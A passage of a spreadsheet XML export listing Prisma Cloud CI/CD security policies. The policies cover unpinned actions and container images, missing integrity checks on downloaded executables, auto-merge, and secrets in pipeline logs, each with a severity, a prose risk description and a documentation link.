        </is>
      </c>
      <c r="Y120" t="inlineStr"/>
      <c r="Z120" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA120" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB120" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC120" t="inlineStr"/>
      <c r="AD120" t="b">
        <v>1</v>
      </c>
      <c r="AE120" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF120" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>da3a2979-8611-4c05-ab79-12b60bbcc66c</t>
        </is>
      </c>
      <c r="AI120" t="inlineStr"/>
      <c r="AJ120" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK120" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" t="inlineStr"/>
      <c r="B121" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C121" s="2" t="inlineStr"/>
      <c r="D121" t="inlineStr"/>
      <c r="E121" t="inlineStr"/>
      <c r="F121" t="inlineStr"/>
      <c r="G121" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J121" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K121" t="inlineStr">
        <is>
          <t>Missing integrity check for downloaded executable in CircleCI pipeline</t>
        </is>
      </c>
      <c r="L121" t="inlineStr"/>
      <c r="M121" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N121" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O121" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P121" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q121" t="inlineStr"/>
      <c r="R121" t="inlineStr"/>
      <c r="S121" t="inlineStr"/>
      <c r="T121" t="b">
        <v>0</v>
      </c>
      <c r="U121" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V121" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W121" t="inlineStr">
        <is>
          <t>Executables are downloaded and executed during a pipeline run without being validated for integrity, a check which verifies the executable`s content. An attacker who compromises the executable can execute code in the pipeline that can exfiltrate credentials or affect the build process in order to ship malicious code or artifacts to production.</t>
        </is>
      </c>
      <c r="X121" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-miss-integrity-check-download-exe</t>
        </is>
      </c>
      <c r="Y121" t="inlineStr"/>
      <c r="Z121" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA121" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB121" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC121" t="inlineStr"/>
      <c r="AD121" t="b">
        <v>1</v>
      </c>
      <c r="AE121" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF121" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>de7cb73f-62af-421b-8740-e633dde8b2c9</t>
        </is>
      </c>
      <c r="AI121" t="inlineStr"/>
      <c r="AJ121" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK121" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" t="inlineStr"/>
      <c r="B122" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C122" s="2" t="inlineStr"/>
      <c r="D122" t="inlineStr"/>
      <c r="E122" t="inlineStr"/>
      <c r="F122" t="inlineStr"/>
      <c r="G122" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J122" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K122" t="inlineStr">
        <is>
          <t>Missing integrity check for downloaded executable in GitHub Actions pipeline</t>
        </is>
      </c>
      <c r="L122" t="inlineStr"/>
      <c r="M122" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N122" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O122" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P122" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q122" t="inlineStr"/>
      <c r="R122" t="inlineStr"/>
      <c r="S122" t="inlineStr"/>
      <c r="T122" t="b">
        <v>0</v>
      </c>
      <c r="U122" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V122" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W122" t="inlineStr">
        <is>
          <t>Executables are downloaded and executed during a pipeline run without being validated for integrity, a check which verifies the executable`s content. An attacker who compromises the executable can execute code in the pipeline that can exfiltrate credentials or affect the build process in order to ship malicious code or artifacts to production.</t>
        </is>
      </c>
      <c r="X122" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-miss-integrity-check-download-exe</t>
        </is>
      </c>
      <c r="Y122" t="inlineStr"/>
      <c r="Z122" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA122" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB122" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC122" t="inlineStr"/>
      <c r="AD122" t="b">
        <v>1</v>
      </c>
      <c r="AE122" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF122" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>813ea3d7-ebae-404e-91c4-a90838656ac4</t>
        </is>
      </c>
      <c r="AI122" t="inlineStr"/>
      <c r="AJ122" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK122" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" t="inlineStr"/>
      <c r="B123" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C123" s="2" t="inlineStr"/>
      <c r="D123" t="inlineStr"/>
      <c r="E123" t="inlineStr"/>
      <c r="F123" t="inlineStr"/>
      <c r="G123" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J123" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K123" t="inlineStr">
        <is>
          <t>Unpinned GitHub Actions</t>
        </is>
      </c>
      <c r="L123" t="inlineStr"/>
      <c r="M123" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N123" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O123" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P123" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q123" t="inlineStr"/>
      <c r="R123" t="inlineStr"/>
      <c r="S123" t="inlineStr"/>
      <c r="T123" t="b">
        <v>0</v>
      </c>
      <c r="U123" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V123" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W123" t="inlineStr">
        <is>
          <t>Unpinned GitHub actions are mutable, potentially allowing attackers with access to the action`s repository to push a malicious version of the action, introducing poisoned code which can be executed in the pipeline in order to access stored secrets or to read or modify the source code.</t>
        </is>
      </c>
      <c r="X123" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/unpinned-github-actions</t>
        </is>
      </c>
      <c r="Y123" t="inlineStr"/>
      <c r="Z123" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA123" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB123" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC123" t="inlineStr"/>
      <c r="AD123" t="b">
        <v>1</v>
      </c>
      <c r="AE123" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF123" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>1b16c88f-6ca4-4d67-b4ed-f1c4e127f57d</t>
        </is>
      </c>
      <c r="AI123" t="inlineStr"/>
      <c r="AJ123" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK123" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" t="inlineStr"/>
      <c r="B124" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C124" s="2" t="inlineStr"/>
      <c r="D124" t="inlineStr"/>
      <c r="E124" t="inlineStr"/>
      <c r="F124" t="inlineStr"/>
      <c r="G124" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J124" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K124" t="inlineStr">
        <is>
          <t>Azure Pipelines uses an unpinned container image</t>
        </is>
      </c>
      <c r="L124" t="inlineStr"/>
      <c r="M124" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N124" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O124" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P124" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q124" t="inlineStr"/>
      <c r="R124" t="inlineStr"/>
      <c r="S124" t="inlineStr"/>
      <c r="T124" t="b">
        <v>0</v>
      </c>
      <c r="U124" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V124" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W124" t="inlineStr">
        <is>
          <t>Docker containers used without digests are mutable, which may cause a security risk. Attackers with access to the container registry could potentially replace the image with a malicious version, introducing malicious code. This code might be executed in the pipeline using this container image to access secrets available in the pipeline, and read or modify the associated repository's source code.</t>
        </is>
      </c>
      <c r="X124" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-unpinned-container-image</t>
        </is>
      </c>
      <c r="Y124" t="inlineStr"/>
      <c r="Z124" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA124" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB124" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC124" t="inlineStr"/>
      <c r="AD124" t="b">
        <v>1</v>
      </c>
      <c r="AE124" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF124" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>66f2e807-0ec1-4042-ba84-8f605ab9c81c</t>
        </is>
      </c>
      <c r="AI124" t="inlineStr"/>
      <c r="AJ124" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK124" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" t="inlineStr"/>
      <c r="B125" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C125" s="2" t="inlineStr"/>
      <c r="D125" t="inlineStr"/>
      <c r="E125" t="inlineStr"/>
      <c r="F125" t="inlineStr"/>
      <c r="G125" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J125" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K125" t="inlineStr">
        <is>
          <t>Missing integrity check for downloaded executable in Azure Pipelines pipeline</t>
        </is>
      </c>
      <c r="L125" t="inlineStr"/>
      <c r="M125" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N125" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O125" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P125" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q125" t="inlineStr"/>
      <c r="R125" t="inlineStr"/>
      <c r="S125" t="inlineStr"/>
      <c r="T125" t="b">
        <v>0</v>
      </c>
      <c r="U125" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V125" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W125" t="inlineStr">
        <is>
          <t>Executables are downloaded and executed during a pipeline run without being validated for integrity, a check which verifies the executable's content. An attacker who compromises the executable can execute code in the pipeline that can exfiltrate credentials or affect the build process in order to ship malicious code or artifacts to production.</t>
        </is>
      </c>
      <c r="X125" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-missing-integrity-check-download-exe</t>
        </is>
      </c>
      <c r="Y125" t="inlineStr"/>
      <c r="Z125" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA125" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB125" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC125" t="inlineStr"/>
      <c r="AD125" t="b">
        <v>1</v>
      </c>
      <c r="AE125" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF125" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>0c739c8e-d5d1-4866-b1e5-293e3b59080c</t>
        </is>
      </c>
      <c r="AI125" t="inlineStr"/>
      <c r="AJ125" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK125" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" t="inlineStr"/>
      <c r="B126" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C126" s="2" t="inlineStr"/>
      <c r="D126" t="inlineStr"/>
      <c r="E126" t="inlineStr"/>
      <c r="F126" t="inlineStr"/>
      <c r="G126" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J126" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K126" t="inlineStr">
        <is>
          <t>Auto-merge configured in pipeline</t>
        </is>
      </c>
      <c r="L126" t="inlineStr"/>
      <c r="M126" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N126" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O126" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P126" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q126" t="inlineStr"/>
      <c r="R126" t="inlineStr"/>
      <c r="S126" t="inlineStr"/>
      <c r="T126" t="b">
        <v>0</v>
      </c>
      <c r="U126" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V126" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W126" t="inlineStr">
        <is>
          <t>Auto-merge logic in pipelines is usually executed when conditions that check for minor changes in the code are met. These conditions may contain flaws, allowing attackers with \"write\" access to take advantage of them in order to bypass pull request reviews and to merge malicious code to protected branches.</t>
        </is>
      </c>
      <c r="X126" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/cross-platform-cicd-pipeline-policies/cp-auto-merge-configured-pipeline</t>
        </is>
      </c>
      <c r="Y126" t="inlineStr"/>
      <c r="Z126" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA126" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB126" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC126" t="inlineStr"/>
      <c r="AD126" t="b">
        <v>1</v>
      </c>
      <c r="AE126" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF126" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>1dcf0baf-3397-41ec-aec7-5136fa322dab</t>
        </is>
      </c>
      <c r="AI126" t="inlineStr"/>
      <c r="AJ126" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK126" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" t="inlineStr"/>
      <c r="B127" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C127" s="2" t="inlineStr"/>
      <c r="D127" t="inlineStr"/>
      <c r="E127" t="inlineStr"/>
      <c r="F127" t="inlineStr"/>
      <c r="G127" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J127" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K127" t="inlineStr">
        <is>
          <t>CircleCI pipeline uses an unpinned container image</t>
        </is>
      </c>
      <c r="L127" t="inlineStr"/>
      <c r="M127" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N127" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O127" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P127" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q127" t="inlineStr"/>
      <c r="R127" t="inlineStr"/>
      <c r="S127" t="inlineStr"/>
      <c r="T127" t="b">
        <v>0</v>
      </c>
      <c r="U127" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V127" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W127" t="inlineStr">
        <is>
          <t>Docker containers used without digests are mutable, which may cause a security risk. Attackers with access to the container registry could potentially replace the image with a malicious version, introducing malicious code. This code might be executed in the pipeline using this container image to access secrets available in the pipeline, and read or modify the associated repository's source code.</t>
        </is>
      </c>
      <c r="X127" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-pipeline-unpinned-image</t>
        </is>
      </c>
      <c r="Y127" t="inlineStr"/>
      <c r="Z127" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA127" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB127" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC127" t="inlineStr"/>
      <c r="AD127" t="b">
        <v>1</v>
      </c>
      <c r="AE127" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF127" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>7220c221-0eff-48cb-9133-3b8af6b1ff53</t>
        </is>
      </c>
      <c r="AI127" t="inlineStr"/>
      <c r="AJ127" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK127" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" t="inlineStr"/>
      <c r="B128" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C128" s="2" t="inlineStr"/>
      <c r="D128" t="inlineStr"/>
      <c r="E128" t="inlineStr"/>
      <c r="F128" t="inlineStr"/>
      <c r="G128" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J128" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="K128" t="inlineStr">
        <is>
          <t>Missing integrity check for downloaded executable in Jenkins pipeline</t>
        </is>
      </c>
      <c r="L128" t="inlineStr"/>
      <c r="M128" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N128" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O128" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P128" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q128" t="inlineStr"/>
      <c r="R128" t="inlineStr"/>
      <c r="S128" t="inlineStr"/>
      <c r="T128" t="b">
        <v>0</v>
      </c>
      <c r="U128" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V128" t="inlineStr">
        <is>
          <t>CI/CD:Artifact Integrity Validation:</t>
        </is>
      </c>
      <c r="W128" t="inlineStr">
        <is>
          <t>Executables are downloaded and executed during a pipeline run without being validated for integrity, a check which verifies the executable`s content. An attacker who compromises the executable can execute code in the pipeline that can exfiltrate credentials or affect the build process in order to ship malicious code or artifacts to production.</t>
        </is>
      </c>
      <c r="X128" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-miss-integrity-check-download-exe</t>
        </is>
      </c>
      <c r="Y128" t="inlineStr"/>
      <c r="Z128" t="inlineStr">
        <is>
          <t>{"category":"Artifact Integrity Validation","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA128" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB128" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC128" t="inlineStr"/>
      <c r="AD128" t="b">
        <v>1</v>
      </c>
      <c r="AE128" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF128" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>d8aef638-17e7-4835-8960-a825fc0177b7</t>
        </is>
      </c>
      <c r="AI128" t="inlineStr"/>
      <c r="AJ128" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK128" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" t="inlineStr"/>
      <c r="B129" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C129" s="2" t="inlineStr"/>
      <c r="D129" t="inlineStr"/>
      <c r="E129" t="inlineStr"/>
      <c r="F129" t="inlineStr"/>
      <c r="G129" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J129" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K129" t="inlineStr">
        <is>
          <t>Secrets found in logs of a GitLab CI pipeline</t>
        </is>
      </c>
      <c r="L129" t="inlineStr"/>
      <c r="M129" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N129" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O129" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P129" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q129" t="inlineStr"/>
      <c r="R129" t="inlineStr"/>
      <c r="S129" t="inlineStr"/>
      <c r="T129" t="b">
        <v>0</v>
      </c>
      <c r="U129" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V129" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W129" t="inlineStr">
        <is>
          <t>Secrets exposed in build log files can be used by an attacker who has taken over an account with system access to move laterally throughout the organization. Exposed secrets can be caused by not taking the appropriate safeguards to protect credentials or by printing credentials in a manner that bypasses the feature`s ability to detect credentials.</t>
        </is>
      </c>
      <c r="X129" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-repos-secrets-in-pipeline-logs</t>
        </is>
      </c>
      <c r="Y129" t="inlineStr"/>
      <c r="Z129" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA129" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB129" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC129" t="inlineStr"/>
      <c r="AD129" t="b">
        <v>1</v>
      </c>
      <c r="AE129" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF129" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>ab73753a-f8bd-4219-b2d8-a83e7f77de0b</t>
        </is>
      </c>
      <c r="AI129" t="inlineStr"/>
      <c r="AJ129" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK129" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" t="inlineStr"/>
      <c r="B130" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C130" s="2" t="inlineStr"/>
      <c r="D130" t="inlineStr"/>
      <c r="E130" t="inlineStr"/>
      <c r="F130" t="inlineStr"/>
      <c r="G130" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J130" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K130" t="inlineStr">
        <is>
          <t>Unrotated repository secrets in GitHub Actions</t>
        </is>
      </c>
      <c r="L130" t="inlineStr"/>
      <c r="M130" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N130" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O130" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P130" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q130" t="inlineStr"/>
      <c r="R130" t="inlineStr"/>
      <c r="S130" t="inlineStr"/>
      <c r="T130" t="b">
        <v>0</v>
      </c>
      <c r="U130" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V130" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W130" t="inlineStr">
        <is>
          <t>Secrets stored in your GitHub repository were not rotated for more than 180 days. As long as a secret exists, the greater the potential for an attacker to gain access to it. An attacker who gains access to such secrets could potentially compromise various components of your infrastructure and applications, resulting in unauthorized access and data breaches.</t>
        </is>
      </c>
      <c r="X130" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
